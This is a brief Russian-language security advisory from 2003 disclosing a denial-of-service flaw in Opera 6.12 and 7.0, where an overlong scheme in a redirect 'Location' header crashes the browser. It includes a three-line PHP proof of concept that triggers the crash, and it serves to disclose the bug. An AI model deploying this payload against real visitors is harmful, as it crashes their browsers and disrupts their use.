Security Lab

Отказ в обслуживании при обработке заголовка 'Location' в web браузере OPERA

Дата публикации:31.07.2003
Всего просмотров:1353
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Отказ в обслуживании обнаружен в Opera web браузере в обработке перенаправляемых URL. Удаленный пользователь может аварийно завершить работу браузера.

Удаленный пользователь может послать HTTP запрос, который включает специально обработанный заголовок 'Location', чтобы аварийно завершить работу браузера. Пример:

<?php
for($i=0; 20000+10000>$i; $i++) $prot.="A";
header("Location: $prot://dd");
?>
Уязвимость обнаружена в Opera 6.12, 7.0

Способов устранения обнаруженной уязвимости не существует в настоящее время.